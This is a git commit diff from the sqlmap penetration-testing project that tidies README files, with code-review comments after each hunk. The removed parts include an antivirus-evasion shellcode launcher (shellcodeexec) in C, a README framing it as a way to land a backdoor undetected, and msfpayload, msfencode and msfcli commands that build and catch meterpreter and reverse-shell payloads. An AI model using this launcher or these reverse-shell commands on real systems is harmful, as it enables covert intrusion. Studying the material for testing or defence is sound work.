cleanup to README files

Bernardo Damele 2012-07-17 00:32:32 +01:00
parent 7198e3185b
commit 224e6376a6
11 changed files with 12 additions and 448 deletions

View File

@ -8,14 +8,14 @@ icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible
The master is straight forward to use. There are no extra libraries required for the C version. The master is straight forward to use. There are no extra libraries required for the C version.
The Perl master however has the following dependencies: The Perl master however has the following dependencies:
* IO::Socket * IO::Socket
* NetPacket::IP * NetPacket::IP
* NetPacket::ICMP * NetPacket::ICMP
When running the master, don't forget to disable ICMP replies by the OS. For example: When running the master, don't forget to disable ICMP replies by the OS. For example:
sysctl -w net.ipv4.icmp_echo_ignore_all=1 sysctl -w net.ipv4.icmp_echo_ignore_all=1
If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
commands send from the master. commands send from the master.
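Review bot: the last line of this hunk keeps the typo "commands send from the master"; it should read "commands sent from the master", and since the surrounding lines are already being touched the fix belongs here. The sysctl advice also deserves one more sentence: `net.ipv4.icmp_echo_ignore_all=1` silences echo replies for the whole host, not just for the master's session, and a `sysctl -w` setting does not survive a reboot, so the README should tell the user to restore it afterwards with `sysctl -w net.ipv4.icmp_echo_ignore_all=0`.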
@ -29,12 +29,12 @@ The slave comes with a few command line options as outlined below:
-t host host ip address to send ping requests to. This option is mandatory! -t host host ip address to send ping requests to. This option is mandatory!
-r send a single test icmp request containing the string "Test1234" and then quit. -r send a single test icmp request containing the string "Test1234" and then quit.
This is for testing the connection. This is for testing the connection.
-d milliseconds delay between requests in milliseconds -d milliseconds delay between requests in milliseconds
-o milliseconds timeout of responses in milliseconds. If a response has not received in time, -o milliseconds timeout of responses in milliseconds. If a response has not received in time,
the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit. the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
The counter is set back to 0 if a response was received. The counter is set back to 0 if a response was received.
-b num limit of blanks (unanswered icmp requests before quitting -b num limit of blanks (unanswered icmp requests before quitting
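Review bot: two defects in the option table survive this edit. "If a response has not received in time" should be "has not been received in time", and the `-b num` description has an unclosed parenthesis: "(unanswered icmp requests before quitting". Both lines are inside the hunk, so fix them in this commit rather than leaving them for a later cleanup.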

View File

@ -1,7 +1,3 @@
Files in this folder can be used to compile auxiliary program that can Files in this folder can be used to compile auxiliary program that can
be used for running command prompt commands skipping standard "cmd /c" way. be used for running command prompt commands skipping standard "cmd /c" way.
They are licensed under the terms of the GNU Lesser General Public License They are licensed under the terms of the GNU Lesser General Public License.
and it's compiled version is available on the official sqlmap subversion
repository[1].
[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_
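Review bot: the replacement sentence drops the only pointer to where the compiled `runcmd.exe_` is published (the removed `[1]` svn URL) without adding a new one, whereas the other READMEs in this commit now cite a GitHub repository. Either name the new location or state explicitly that the binary ships in this folder. Grammar nits while the lines are open: "compile auxiliary program" should be "compile an auxiliary program", and "skipping standard "cmd /c" way" reads better as "bypassing the standard "cmd /c" invocation".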

View File

@ -1,126 +0,0 @@
= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
= Background =
Most of the shellcode launchers out there, including proof of concepts
part of many "security" books, detail how to allocate a memory page as
readable/writable/executable on POSIX systems, copy over your shellcode
and execute it. This works just fine. However, it is limited to POSIX,
does not necessarily consider 64-bit architecture and Windows systems.
= Description =
This script and the relevant project files (Makefile and Visual Studio
files) allow you to compile the tool once then run your shellcode across
different architectures and operating systems.
Moreover, it solves a common real world issue: the target system's anti
virus software blocking a Metasploit-generated payload stager (either EXE
of ELF). Take for instance the following command line:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
This generates a Metasploit payload stager, payload.exe, that as soon as
it lands on the AV-protected target system is recognized as malicious and
potentially blocked (depending on the on-access scan settings) by many
anti virus products. At the time of writing this text, 21 out 41 anti
viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it
multiple times with msfencode, less AV softwares detect it, still a lot.
I have been surfing the Net and found some interesting tutorials and
guides about packing, compressing, obfuscating and applying IDA-foo to
portable executables et similar in order to narrow down the number of AV
products that can detect it as a malicious file. This is all interesting,
but does not stop few hard-to-die anti viruses to detect your backdoor.
So the question is, how cool would it be to have a final solution to avoid
all this hassle? This is exactly where this tool comes into play!
= Features =
shellcodeexec:
* Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
* Can be compiled and works on 32-bit and 64-bit architectures.
* As far as I know, no AV detect it as malicious.
* Works in DEP/NX-enabled environments: it allocates the memory page where
it stores the shellcode as +rwx - Readable Writable and eXecutable.
* It supports alphanumeric encoded payloads: you can pipe your binary-encoded
shellcode (generated for instance with Metasploit's msfpayload) to
Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the
BufferRegister variable to EAX registry where the address in memory of
the shellcode will be stored, to avoid get_pc() binary stub to be
prepended to the shellcode.
* Spawns a new thread where the shellcode is executed in a structure
exception handler (SEH) so that if you wrap shellcodeexec into your own
executable, it avoids the whole process to crash in case of unexpected
behaviours.
= HowTo =
1. Generate a Metasploit shellcode and encode it with the alphanumeric
encoder. For example for a Linux target:
$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
Or for a Windows target:
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
2. Execute the Metasploit multi/handler listener on your machine. For
example for a Linux target:
$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
Or for a Windows target:
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
3. Execute the alphanumeric-encoded shellcode with this tool. For example
on the Linux target:
$ ./shellcodeexec <msfencode's alphanumeric-encoded payload>
Or, on the Windows target:
C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>
= License =
This source code is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
= Author =
Bernardo Damele A. G. <bernardo.damele@gmail.com>
= Homepage =
https://github.com/inquisb/shellcodeexec
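Review bot: deleting this README removes the in-tree copy of the LGPL 2.1 licence text and the author attribution for the shellcodeexec binaries that stay in the folder; the four-line README added elsewhere in this commit only names the licence and links to https://github.com/inquisb/shellcodeexec, which is acceptable only if the upstream repository carries the full licence. The HowTo section is also the only place that documents the input format the shipped binaries accept (an `x86/alpha_mixed` encoded payload generated with `BufferRegister=EAX`); make sure that requirement survives in sqlmap's own documentation or in the upstream README before this is merged.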

View File

@ -0,0 +1,4 @@
Binary files in this folder are data files used by sqlmap on the target
system, but not executed on the system running sqlmap. They are licensed
under the terms of the GNU Lesser General Public License and their source
code is available on https://github.com/inquisb/shellcodeexec.
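Review bot: the new README points at the upstream repository but does not record which upstream commit or tag the shipped binaries were built from, nor their checksums, so a user cannot rebuild or verify the prebuilt files that sqlmap uploads to target systems. Add a line next to the link with the upstream revision and, ideally, a SHA-256 for each binary in the folder. Minor: "available on https://..." should be "available at".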

View File

@ -1,7 +0,0 @@
32:
gcc -Wall -Os shellcodeexec.c -o shellcodeexec
strip -sx shellcodeexec
64:
gcc -Wall -Os shellcodeexec.c -fPIC -o shellcodeexec
strip -sx shellcodeexec
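Review bot: with this build note removed there is no record in sqlmap's tree of how the shipped ELF binaries were produced (`-Os`, `strip -sx`, and `-fPIC` for the 64-bit build only); if the upstream repository's Makefile does not match these two recipes, note the difference in the new README so the binaries remain reproducible. The 64-bit recipe differing from the 32-bit one only by `-fPIC` is also worth confirming upstream as intentional, since `-fPIC` alone does not make a standalone executable position independent.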

View File

@ -1,138 +0,0 @@
/*
shellcodeexec - Script to execute in memory a sequence of opcodes
Copyright (C) 2011 Bernardo Damele A. G.
web: http://bernardodamele.blogspot.com
email: bernardo.damele@gmail.com
This source code is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <sys/types.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
#include <ctype.h>
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
#include <windows.h>
DWORD WINAPI exec_payload(LPVOID lpParameter);
#else
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>
#endif
int sys_bineval(char *argv);
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
exit(-1);
}
sys_bineval(argv[1]);
exit(0);
}
int sys_bineval(char *argv)
{
size_t len;
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
int pID;
char *code;
#else
int *addr;
size_t page_size;
pid_t pID;
#endif
len = (size_t)strlen(argv);
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
// allocate a +rwx memory page
code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// copy over the shellcode
strncpy(code, argv, len);
// execute it by ASM code defined in exec_payload function
WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
#else
pID = fork();
if(pID<0)
return 1;
if(pID==0)
{
page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
page_size = (len+page_size) & ~(page_size); // align to page boundary
// mmap an +rwx memory page
addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
if (addr == MAP_FAILED)
return 1;
// copy over the shellcode
strncpy((char *)addr, argv, len);
// execute it
((void (*)(void))addr)();
}
if(pID>0)
waitpid(pID, 0, WNOHANG);
#endif
return 0;
}
#if defined(_WIN64)
void __exec_payload(LPVOID);
DWORD WINAPI exec_payload(LPVOID lpParameter)
{
__try
{
__exec_payload(lpParameter);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}
return 0;
}
#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
DWORD WINAPI exec_payload(LPVOID lpParameter)
{
__try
{
__asm
{
mov eax, [lpParameter]
call eax
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}
return 0;
}
#endif
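Review bot: since this source is being removed rather than fixed, two defects visible in it should be reported upstream before the binaries kept in this folder are rebuilt from it. On Windows `pID` is declared `int` but passed as the `LPDWORD lpThreadId` argument of `CreateThread` (`&pID`), a type mismatch. On POSIX the parent calls `waitpid(pID, 0, WNOHANG)`, which returns immediately, so the parent exits while the child is still running; and the child's `return 1` on the `mmap` failure path propagates to `main`, which ignores the result and calls `exit(0)`, so an allocation failure is never reported.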

View File

@ -1,25 +0,0 @@
Before compiling, an enviroment variable has to be set.
--------------------------------------------------------------------------
Variable name Variable description
--------------------------------------------------------------------------
PLATFORM_SDK_DIR Directory where the Platform SDK is installed
Procedure for setting environment variables on Windows:
My Computer -> Properties -> Advanced -> Environment Variables
User variables -> New
Sample value:
--------------------------------------------------------------------------
Variable name Variable value
--------------------------------------------------------------------------
PLATFORM_SDK_DIR C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
Notes:
To get as small portable executable as possible compile as follows:
* Use Visual C++ 2005
* Strip the executable with UPX
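Review bot: "enviroment" on the first line should be "environment"; it only matters if this text is carried into the upstream repository. More importantly, the two build notes here (Visual C++ 2005, UPX packing) are part of the provenance of the shipped Windows binary: packing changes the file's hash and layout, so whether the binary in this folder is UPX-packed, and from which compiler, should be recorded wherever the binaries' origin is documented now that this file is gone.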

View File

@ -1,138 +0,0 @@
/*
shellcodeexec - Script to execute in memory a sequence of opcodes
Copyright (C) 2011 Bernardo Damele A. G.
web: http://bernardodamele.blogspot.com
email: bernardo.damele@gmail.com
This source code is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include <sys/types.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <time.h>
#include <ctype.h>
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
#include <windows.h>
DWORD WINAPI exec_payload(LPVOID lpParameter);
#else
#include <sys/mman.h>
#include <sys/wait.h>
#include <unistd.h>
#endif
int sys_bineval(char *argv);
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
exit(-1);
}
sys_bineval(argv[1]);
exit(0);
}
int sys_bineval(char *argv)
{
size_t len;
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
int pID;
char *code;
#else
int *addr;
size_t page_size;
pid_t pID;
#endif
len = (size_t)strlen(argv);
#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
// allocate a +rwx memory page
code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// copy over the shellcode
strncpy(code, argv, len);
// execute it by ASM code defined in exec_payload function
WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
#else
pID = fork();
if(pID<0)
return 1;
if(pID==0)
{
page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
page_size = (len+page_size) & ~(page_size); // align to page boundary
// mmap an +rwx memory page
addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
if (addr == MAP_FAILED)
return 1;
// copy over the shellcode
strncpy((char *)addr, argv, len);
// execute it
((void (*)(void))addr)();
}
if(pID>0)
waitpid(pID, 0, WNOHANG);
#endif
return 0;
}
#if defined(_WIN64)
void __exec_payload(LPVOID);
DWORD WINAPI exec_payload(LPVOID lpParameter)
{
__try
{
__exec_payload(lpParameter);
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}
return 0;
}
#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
DWORD WINAPI exec_payload(LPVOID lpParameter)
{
__try
{
__asm
{
mov eax, [lpParameter]
call eax
}
}
__except(EXCEPTION_EXECUTE_HANDLER)
{
}
return 0;
}
#endif
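Review bot: this hunk is a line-for-line duplicate of the shellcodeexec.c removed earlier in this commit (same 138 lines), so two folders were carrying identical copies of the source; consolidating on the upstream repository is the right call. The same `CreateThread(..., &pID)` type mismatch and non-blocking `waitpid(..., WNOHANG)` points raised on the first copy apply here and should go upstream.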

View File

@ -1,6 +1,4 @@
Binary files in this folder are data files used by sqlmap on the target Binary files in this folder are data files used by sqlmap on the target
system, but not executed on the system running sqlmap. They are licensed system, but not executed on the system running sqlmap. They are licensed
under the terms of the GNU Lesser General Public License and their source under the terms of the GNU Lesser General Public License and their source
code is available on the official sqlmap subversion repository[1]. code is available on https://github.com/sqlmapproject/udfhack.
[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack/
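Review bot: "code is available on https://github.com/sqlmapproject/udfhack" should read "available at"; more substantively, as with the shellcodeexec README in this commit, the link alone does not say which udfhack revision the shipped UDF binaries were built from, so add the upstream revision (and checksums) so a user can rebuild or verify them. Replacing the svn footnote with an inline GitHub URL is consistent with the other READMEs here.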